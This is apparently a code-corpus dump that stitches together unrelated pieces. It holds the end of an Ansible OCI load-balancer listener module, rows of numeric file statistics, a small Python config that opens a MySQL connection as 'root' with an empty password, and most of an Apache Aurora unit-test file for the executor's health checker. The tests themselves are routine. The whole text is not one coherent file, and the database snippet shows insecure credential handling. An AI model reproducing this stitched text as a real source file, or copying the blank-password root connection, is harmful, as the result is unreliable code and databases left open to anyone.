trusted_certificate_authority_ids=dict(type="list", elements="str"),
certificate_ids=dict(type="list", elements="str"),
certificate_name=dict(type="str"),
protocols=dict(type="list", elements="str"),
cipher_suite_name=dict(type="str"),
server_order_preference=dict(
type="str", choices=["ENABLED", "DISABLED"]
),
),
),
connection_configuration=dict(
type="dict",
options=dict(
idle_timeout=dict(type="int", required=True),
backend_tcp_proxy_protocol_version=dict(type="int"),
),
),
name=dict(type="str", required=True),
routing_policy_name=dict(type="str"),
rule_set_names=dict(type="list", elements="str"),
load_balancer_id=dict(type="str", required=True),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="listener",
service_client_class=LoadBalancerClient,
namespace="load_balancer",
)
result = dict(changed=False)
if resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_create():
result = resource_helper.create()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 45.860119
| 154
| 0.590564
| 3,232
| 30,818
| 5.473082
| 0.122834
| 0.022387
| 0.020182
| 0.024931
| 0.841992
| 0.814518
| 0.766409
| 0.731472
| 0.698287
| 0.680875
| 0
| 0.009828
| 0.342949
| 30,818
| 671
| 155
| 45.928465
| 0.863746
| 0.013953
| 0
| 0.717286
| 0
| 0.050081
| 0.808731
| 0.099388
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016155
| false
| 0.008078
| 0.012924
| 0.008078
| 0.050081
| 0.001616
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3adc8aef5ddcc4f82d6dc688a380de5c6b6373e
| 163
|
py
|
Python
|
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | 4
|
2019-02-17T22:01:12.000Z
|
2021-01-13T06:59:41.000Z
|
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | null | null | null |
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | null | null | null |
#coding=utf-8
def connect_db():
import mysql.connector
return mysql.connector.connect(user='root', password='', database='novel2love', use_unicode=True)
| 23.285714
| 101
| 0.730061
| 21
| 163
| 5.571429
| 0.857143
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013986
| 0.122699
| 163
| 6
| 102
| 27.166667
| 0.804196
| 0.07362
| 0
| 0
| 0
| 0
| 0.093333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
a3b5a22a805753d42e97f8f1e4e3dab7d3c9c507
| 55,338
|
py
|
Python
|
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | 1
|
2022-02-27T10:41:45.000Z
|
2022-02-27T10:41:45.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os.path
import threading
import time
import unittest
import mock
import pytest
from mesos.interface.mesos_pb2 import TaskState
from twitter.common.exceptions import ExceptionalThread
from twitter.common.testing.clock import ThreadedClock
from apache.aurora.common.health_check.http_signaler import HttpSignaler
from apache.aurora.config.schema.base import (
HealthCheckConfig,
HealthCheckerConfig,
HttpHealthChecker,
ShellHealthChecker
)
from apache.aurora.executor.common.health_checker import (
HealthChecker,
HealthCheckerProvider,
NoopHealthChecker
)
from apache.aurora.executor.common.sandbox import SandboxInterface
from apache.aurora.executor.common.status_checker import StatusResult
from .fixtures import HELLO_WORLD, MESOS_JOB
from gen.apache.aurora.api.ttypes import AssignedTask, ExecutorConfig, JobKey, TaskConfig
class TestHealthChecker(unittest.TestCase):
def setUp(self):
self._clock = ThreadedClock(0)
self._checker = mock.Mock(spec=HttpSignaler)
self.initial_interval_secs = 15
self.interval_secs = 10
self.fake_health_checks = []
def mock_health_check():
return self.fake_health_checks.pop(0)
self._checker.health = mock.Mock(spec=self._checker.__call__)
self._checker.health.side_effect = mock_health_check
def append_health_checks(self, status, num_calls=1):
for i in range(num_calls):
self.fake_health_checks.append((status, 'reason'))
def test_grace_period_2x_success(self):
'''Grace period is 2 x interval and health checks succeed.'''
self.append_health_checks(True, num_calls=2)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 1
def test_grace_period_2x_failure_then_success(self):
'''Grace period is 2 x interval and health checks fail then succeed.'''
self.append_health_checks(False)
self.append_health_checks(True)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 2
def test_ignore_failures_after_running_inside_grace_period(self):
'''Grace period is 2 x interval and health checks succeed then fail.'''
self.append_health_checks(True)
self.append_health_checks(False)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
hct.stop()
assert self._checker.health.call_count == 2
def test_does_not_ignores_failures_after_running_outside_grace_period(self):
'''Grace period is 2 x interval and health checks succeed then fail.'''
self.append_health_checks(True)
self.append_health_checks(False, num_calls=2)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 1
hct.stop()
assert self._checker.health.call_count == 3
def test_grace_period_2x_failure(self):
'''
Grace period is 2 x interval and all health checks fail.
Failures are ignored when in grace period.
'''
self.append_health_checks(False, num_calls=3)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.threaded_health_checker.running is False
hct.stop()
assert self._checker.health.call_count == 3
def test_success_outside_grace_period(self):
'''
Health checks fail inside grace period, but pass outside and leads to success
'''
self.append_health_checks(False, num_calls=2)
self.append_health_checks(True)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 3
def test_include_max_failure_to_forgiving_attempts(self):
'''
Health checks fail but never breaches `max_consecutive_failures`
'''
max_consecutive_failures = 4
# health checks fail within grace period
self.append_health_checks(False, num_calls=2)
# health checks fails max_consecutive_failures times and then succeeds
self.append_health_checks(False, num_calls=max_consecutive_failures)
self.append_health_checks(True)
# health checks fails max_consecutive_failures times and then succeeds
self.append_health_checks(False, num_calls=max_consecutive_failures)
self.append_health_checks(False)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
max_consecutive_failures=max_consecutive_failures,
clock=self._clock)
hct.start()
# failures ignored inside grace period
for _ in range(2):
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
# failures never breach max
for _ in range(max_consecutive_failures):
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
self._clock.tick(self.interval_secs)
# failures breach max, causes task failure
for _ in range(max_consecutive_failures):
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 12
def test_initial_interval_whatev(self):
self.append_health_checks(False, 2)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
grace_period_secs=0,
clock=self._clock)
hct.start()
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
hct.stop()
assert self._checker.health.call_count == 1
def test_consecutive_failures_max_failures(self):
'''Verify that a task is unhealthy after max_consecutive_failures is exceeded'''
grace_period_secs = self.initial_interval_secs
interval_secs = self.interval_secs
self.append_health_checks(True, num_calls=2)
self.append_health_checks(False, num_calls=3)
hct = HealthChecker(
self._checker.health,
interval_secs=interval_secs,
grace_period_secs=grace_period_secs,
max_consecutive_failures=2,
min_consecutive_successes=2,
clock=self._clock)
hct.start()
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.metrics.sample()['consecutive_failures'] == 0
self._clock.tick(interval_secs)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.metrics.sample()['consecutive_failures'] == 0
assert hct.threaded_health_checker.running is True
self._clock.tick(interval_secs)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.metrics.sample()['consecutive_failures'] == 1
self._clock.tick(interval_secs)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.metrics.sample()['consecutive_failures'] == 2
self._clock.tick(interval_secs)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.metrics.sample()['consecutive_failures'] == 3
hct.stop()
assert self._checker.health.call_count == 5
def test_consecutive_failures_failfast(self):
'''Verify that health check is failed fast'''
grace_period_secs = self.initial_interval_secs
interval_secs = self.interval_secs
self.append_health_checks(False, num_calls=5)
hct = HealthChecker(
self._checker.health,
interval_secs=interval_secs,
grace_period_secs=grace_period_secs,
max_consecutive_failures=2,
min_consecutive_successes=4,
clock=self._clock)
hct.start()
# failure is ignored inside grace_period_secs
for _ in range(2):
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.metrics.sample()['consecutive_failures'] == 0
self._clock.tick(interval_secs)
# 3 consecutive health check failures causes fail-fast
for attempt in range(2):
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
# failure is not ignored outside grace_period_secs
assert hct.metrics.sample()['consecutive_failures'] == (attempt + 1)
self._clock.tick(interval_secs)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.metrics.sample()['consecutive_failures'] == 3
hct.stop()
assert self._checker.health.call_count == 5
@pytest.mark.skipif('True', reason='Flaky test (AURORA-1182)')
def test_health_checker_metrics(self):
def slow_check():
self._clock.sleep(0.5)
return (True, None)
hct = HealthChecker(slow_check, interval_secs=1, grace_period_secs=1, clock=self._clock)
hct.start()
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, amount=1)
assert hct._total_latency == 0
assert hct.metrics.sample()['total_latency_secs'] == 0
# start the health check (during health check it is still 0)
epsilon = 0.001
self._clock.tick(1.0 + epsilon)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, amount=0.5)
assert hct._total_latency == 0
assert hct.metrics.sample()['total_latency_secs'] == 0
assert hct.metrics.sample()['checks'] == 0
# finish the health check
self._clock.tick(0.5 + epsilon)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, amount=1) # interval_secs
assert hct._total_latency == 0.5
assert hct.metrics.sample()['total_latency_secs'] == 0.5
assert hct.metrics.sample()['checks'] == 1
# tick again
self._clock.tick(1.0 + epsilon)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.tick(0.5 + epsilon)
self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, amount=1) # interval_secs
assert hct._total_latency == 1.0
assert hct.metrics.sample()['total_latency_secs'] == 1.0
assert hct.metrics.sample()['checks'] == 2
class TestHealthCheckerProvider(unittest.TestCase):
def test_from_assigned_task_http(self):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
task_config = TaskConfig(
executorConfig=ExecutorConfig(
name='thermos',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=7
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'health': 9001})
health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
hc = health_checker.threaded_health_checker
assert hc.interval == interval_secs
assert hc.grace_period_secs == initial_interval_secs
assert hc.max_consecutive_failures == max_consecutive_failures
assert hc.min_consecutive_successes == min_consecutive_successes
def test_from_assigned_task_http_endpoint_style_config(self):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
http_config = HttpHealthChecker(
endpoint='/foo',
expected_response='bar',
expected_response_code=201
)
task_config = TaskConfig(
executorConfig=ExecutorConfig(
name='thermos',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
health_checker=HealthCheckerConfig(http=http_config),
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=7
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'health': 9001})
execconfig_data = json.loads(assigned_task.task.executorConfig.data)
http_exec_config = execconfig_data['health_check_config']['health_checker']['http']
assert http_exec_config['endpoint'] == '/foo'
assert http_exec_config['expected_response'] == 'bar'
assert http_exec_config['expected_response_code'] == 201
health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
hc = health_checker.threaded_health_checker
assert hc.interval == interval_secs
assert hc.grace_period_secs == initial_interval_secs
assert hc.max_consecutive_failures == max_consecutive_failures
assert hc.min_consecutive_successes == min_consecutive_successes
@mock.patch('pwd.getpwnam')
def test_from_assigned_task_shell(self, mock_getpwnam):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
timeout_secs = 5
shell_config = ShellHealthChecker(shell_command='failed command')
task_config = TaskConfig(
job=JobKey(role='role', environment='env', name='name'),
executorConfig=ExecutorConfig(
name='thermos-generic',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
health_checker=HealthCheckerConfig(shell=shell_config),
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=timeout_secs
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
execconfig_data = json.loads(assigned_task.task.executorConfig.data)
assert execconfig_data[
'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
mock_sandbox = mock.Mock(spec_set=SandboxInterface)
type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=False)
health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, mock_sandbox)
hc = health_checker.threaded_health_checker
assert hc.interval == interval_secs
assert hc.grace_period_secs == initial_interval_secs
assert hc.max_consecutive_failures == max_consecutive_failures
assert hc.min_consecutive_successes == min_consecutive_successes
mock_getpwnam.assert_called_once_with(task_config.job.role)
@mock.patch('pwd.getpwnam')
def test_from_assigned_task_shell_no_demotion(self, mock_getpwnam):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
timeout_secs = 5
shell_config = ShellHealthChecker(shell_command='failed command')
task_config = TaskConfig(
job=JobKey(role='role', environment='env', name='name'),
executorConfig=ExecutorConfig(
name='thermos-generic',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
health_checker=HealthCheckerConfig(shell=shell_config),
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=timeout_secs
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
execconfig_data = json.loads(assigned_task.task.executorConfig.data)
assert execconfig_data[
'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
mock_sandbox = mock.Mock(spec_set=SandboxInterface)
type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=False)
health_checker = HealthCheckerProvider(nosetuid_health_checks=True).from_assigned_task(
assigned_task,
mock_sandbox)
hc = health_checker.threaded_health_checker
assert hc.interval == interval_secs
assert hc.grace_period_secs == initial_interval_secs
assert hc.max_consecutive_failures == max_consecutive_failures
assert hc.min_consecutive_successes == min_consecutive_successes
# Should not be trying to access role's user info.
assert not mock_getpwnam.called
@mock.patch.dict(os.environ, {'MESOS_DIRECTORY': '/some/path'})
@mock.patch('pwd.getpwnam')
def test_from_assigned_task_shell_filesystem_image(self, mock_getpwnam):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
timeout_secs = 5
shell_config = ShellHealthChecker(shell_command='failed command')
task_config = TaskConfig(
job=JobKey(role='role', environment='env', name='name'),
executorConfig=ExecutorConfig(
name='thermos-generic',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
health_checker=HealthCheckerConfig(shell=shell_config),
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=timeout_secs
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
execconfig_data = json.loads(assigned_task.task.executorConfig.data)
assert execconfig_data[
'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
mock_sandbox = mock.Mock(spec_set=SandboxInterface)
type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=True)
with mock.patch('apache.aurora.executor.common.health_checker.ShellHealthCheck') as mock_shell:
HealthCheckerProvider(
nosetuid_health_checks=False,
mesos_containerizer_path='/some/path/mesos-containerizer').from_assigned_task(
assigned_task,
mock_sandbox)
class NotNone(object):
def __eq__(self, other):
return other is not None
assert mock_shell.mock_calls == [
mock.call(
raw_cmd='failed command',
wrapped_cmd=NotNone(),
preexec_fn=None,
timeout_secs=5.0
)
]
def test_interpolate_cmd(self):
"""Making sure thermos.ports[foo] gets correctly substituted with assignedPorts info."""
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
timeout_secs = 5
shell_cmd = 'FOO_PORT={{thermos.ports[foo]}} failed command'
shell_config = ShellHealthChecker(shell_command=shell_cmd)
task_config = TaskConfig(
executorConfig=ExecutorConfig(
name='thermos-generic',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
health_checker=HealthCheckerConfig(shell=shell_config),
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=timeout_secs
)
).json_dumps()
)
)
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
interpolated_cmd = HealthCheckerProvider.interpolate_cmd(
assigned_task,
cmd=shell_cmd
)
assert interpolated_cmd == 'FOO_PORT=9001 failed command'
def test_from_assigned_task_no_health_port(self):
interval_secs = 17
initial_interval_secs = 3
max_consecutive_failures = 2
min_consecutive_successes = 2
timeout_secs = 5
task_config = TaskConfig(
executorConfig=ExecutorConfig(
name='thermos-generic',
data=MESOS_JOB(
task=HELLO_WORLD,
health_check_config=HealthCheckConfig(
interval_secs=interval_secs,
initial_interval_secs=initial_interval_secs,
max_consecutive_failures=max_consecutive_failures,
min_consecutive_successes=min_consecutive_successes,
timeout_secs=timeout_secs
)
).json_dumps()
)
)
# No health port and we don't have a shell_command.
assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'http': 9001})
health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
assert isinstance(health_checker, NoopHealthChecker)
class TestThreadedHealthChecker(unittest.TestCase):
def setUp(self):
self.health = mock.Mock()
self.health.return_value = (True, 'Fake')
self.sandbox = mock.Mock(spec_set=SandboxInterface)
self.sandbox.exists.return_value = True
self.sandbox.root = '/root'
self.initial_interval_secs = 15
self.interval_secs = 10
self.max_consecutive_failures = 1
self.min_consecutive_successes = 2
self.clock = mock.Mock(spec=time)
self.clock.time.return_value = 0
self.health_checker = HealthChecker(
self.health,
None,
self.interval_secs,
self.initial_interval_secs,
self.max_consecutive_failures,
self.min_consecutive_successes,
self.clock)
self.health_checker_sandbox_exists = HealthChecker(
self.health,
self.sandbox,
self.interval_secs,
self.initial_interval_secs,
self.max_consecutive_failures,
self.min_consecutive_successes,
self.clock)
def test_perform_check_if_not_disabled_snooze_file_is_none(self):
self.health_checker_sandbox_exists.threaded_health_checker.snooze_file = None
assert self.health.call_count == 0
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
self.health_checker.threaded_health_checker._perform_check_if_not_disabled()
assert self.health.call_count == 1
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_no_snooze_file(self, mock_os_path):
mock_os_path.isfile.return_value = False
assert self.health.call_count == 0
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
self.health_checker_sandbox_exists.threaded_health_checker._perform_check_if_not_disabled()
assert self.health.call_count == 1
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_snooze_file_exists(self, mock_os_path):
mock_os_path.isfile.return_value = True
assert self.health.call_count == 0
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
result = (
self.health_checker_sandbox_exists.threaded_health_checker._perform_check_if_not_disabled())
assert self.health.call_count == 0
assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 1
assert result == (True, None)
def test_maybe_update_health_check_count_reset_count(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-3')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
def test_maybe_update_health_check_count_ignore_failures_within_grace_period(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
